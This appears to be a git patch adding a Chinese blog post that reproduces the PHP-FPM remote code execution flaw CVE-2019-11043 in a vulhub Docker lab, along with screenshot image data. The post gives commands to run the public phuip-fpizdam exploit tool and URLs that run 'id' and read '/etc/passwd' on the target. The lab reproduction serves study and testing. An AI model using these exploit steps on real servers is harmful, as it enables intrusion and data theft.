From 004df094764b8f172268e19cece6464d60999bce Mon Sep 17 00:00:00 2001
From: LYT <1929596302@qq.com>
Date: Wed, 11 Sep 2024 14:31:36 +0800
Subject: [PATCH] =?UTF-8?q?post:PHP-FPM=20=E8=BF=9C=E7=A8=8B=E4=BB=A3?=
 =?UTF-8?q?=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 ...47\350\241\214\346\274\217\346\264\236.md" | 55 ++++++++++++++++++
 .../2024-09-10/iShot_2024-09-10_22.15.45.png | Bin 0 -> 38396 bytes
 .../2024-09-10/iShot_2024-09-10_22.16.48.png | Bin 0 -> 250855 bytes
 3 files changed, 55 insertions(+)
 create mode 100644 "_posts/2024-09-10-\346\274\217\346\264\236\345\244\215\347\216\260-PHP-FPM-\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md"
 create mode 100644 assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png
 create mode 100644 assets/img/2024-09-10/iShot_2024-09-10_22.16.48.png
diff --git "a/_posts/2024-09-10-\346\274\217\346\264\236\345\244\215\347\216\260-PHP-FPM-\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/_posts/2024-09-10-\346\274\217\346\264\236\345\244\215\347\216\260-PHP-FPM-\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..03cf97f
--- /dev/null
+++ "b/_posts/2024-09-10-\346\274\217\346\264\236\345\244\215\347\216\260-PHP-FPM-\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md"
@@ -0,0 +1,55 @@
+---
+title: 漏洞复现-PHP-FPM 远程代码执行漏洞
+description: CVE-2019-11043 从一个小的内存溢出到代码执行
+author: #有默认值
+date: 2024-09-10 10:13:14 +0800
+categories: [漏洞复现]
+tags: [漏洞复现,RCE] # TAG names should always be lowercase
+pin: # 默认false,可填true
+math: true
+mermaid: true
+# image:
+# path: /assets/bar/home.png
+# lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+# alt: # 图片名
+---
+
+## 构建
+
+``` shell
+cd vulhub/php/CVE-2019-11043
+docker-compose up -d
+```
+cd
+## 漏洞原理
+https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043/README.zh-cn.md
+
+https://blog.orange.tw/posts/2019-10-an-analysis-and-thought-about-recently/
+
+https://cloud.tencent.com/developer/article/1530703
+
+这是一个非常有趣的漏洞!从一个小的内存缺陷到代码执行。它结合了二进制和网络技术,
+
+## PoC(Proof of Concept) 验证漏洞存在的代码
+作者利用了双缓冲机制,如果缓冲区到达末尾(pos > end),PHP-FPM 会创建一个新的缓冲区,并将前一个缓冲区放入结构成员 fcgi_data_seg->next 中。
+若有 PHPINFO 页面。获取/info.php/%0a.php ,观察 $_SERVER['PATH_INFO'] 是否损坏!
+...
+影响版本:PHP 5.6-7.x,Nginx>=0.7.31
+## Exp(Exploit)进行实际的攻击利用
+安装漏洞利用工具,和利用
+```shell
+git clone https://github.com/neex/phuip-fpizdam.git
+cd phuip-fpizdam
+go run . "http://your-ip:8080/index.php"
+```
+![](../assets/img/2024-09-10/iShot_2024-09-10_22.16.48.png)
+访问http://your-ip:8080/index.php?a=id,即可查看到id命令已成功执行
+![](../assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png)
+注意:只有部分PHP-FPM子进程受到了污染,因此请尝试几次以执行RCE命令,会出现成功执行
+```shell
+/index.php?a=cat /etc/passwd
+```
+
+
+## 复现总结
+无法直接通过url传入反弹shell命令,执行失败
diff --git a/assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png b/assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png
new file mode 100644
index 0000000000000000000000000000000000000000..e95ec282207767cc382fa6cefb84e7e5c6d1ed70
GIT binary patch
literal 38396
zcmaI6b9AQ7(mtAGV%xTD+qRv_#I`23ZJQH26We&=Ol
WWlWltO^Tg#`ftL6DIaR|Nq9j{^Y#g@uOvJLBq1cmo0gTVo|ArYs{S
zMy%}Y@ZHMR0t7@lGBq7aSxpD)=e5r%35oEDs_1nOL;|Web&xA^YC;IIYy^x5jXS26
zBSS>Q&(5N1QrJ4##1_&h2$Tk6qXY>N11z|LqDCa_fveB^YoRYMm+g<5LE6E
z`~l1XP*J#DOp^p=krXOil&y%wA@x07Q=VUOo|!KhFNTtml3F7=-wWZ5zQ@XUOgUv%
zvwpDVOT&_@C2`RNl9Sj`5|A1Y3lR5EC69-hD>?J?M0aQEi}i~8%YIVJrM9G4OgNis
zO=?bXPCSkE79vwaqC;B1P^7C$^2l^Zcri#Nu%+CmnT^*bRj2SV0O+`Al~UUhky2+9
zcE|(7KeOHwz!dwH`?Ug#l?xh-c9RA`FeH|Xz17y19+$o?O)iN@)D$I>sGJVw=
z+DnZOSe%zl8*;|$_$H-&Z}Eo9PAo=p9G$#Nx>LyERRGt_W!l-|+NyBwIby*s@ORqW
zP;?uVjJ-QJjVhH>^BJTd85po$XvX=gq&(m_KaO1aah~T?&%+d({agacRY}u~6J1*G
z1!32<;g_R9K{F&0&Y6AtJ8PTVkgcPn<2C-
zon4Sbj{SzUs{|gYm&18JJdd%e3k9M6sB#m)zoxp-gFvb&^V**k>mjH34%z!I@(j!~
z)Z$VE+a4;Z-lJ(-znlEkwX^-1bT7Kpmoaa$4`faU`P5q2sl_324}Gn}565M<$4?3W
zzRzzG(j4uh8jKHdujP5WaeVi=_ThI93;eA*_swOwU7JUb4(*SBi)?vSj`*ElTl*hU
z#tI=;Y(|sN$|%NbCW$It%^)c^fs#6jS|06gd}o`$+KsLDU4=S%qsF>r|Ca7eajqW=
zzMWJrhjiY$*JD`B&V5`HyUFP-i2=3r9oB}8OD*;5f2=X(UApT0haTTvO#24P{a&-_
z2~btmcC8VKl$x2<5T(@H=YG6E1Ppw4bNc&a_
&vyA#b<
z-I^{TroQATKF0CzZcI8P@3LYING@vgA=FVUL8J#D01lrXmCDX{`Fk;!GEh&1EmIJx1tuDz)SLQF
zlpRVDioFQNgj`umc>`!e&j?=dO;dx=!I>8u
zp)jEfBG{z$R`k);$bJs3r7SdW?UB)9Mbf*t@?IVYrvmVaHY2}o#8cV@JR^V|B?s|IF#PF@pK6E1NxtfT1t
zW*cu~0Gf2vs3U<{I$JnjJHSSF>t~Smbptncs~=+R+<&jflzjtbqI{9Bkz$^dp3+T%
zO_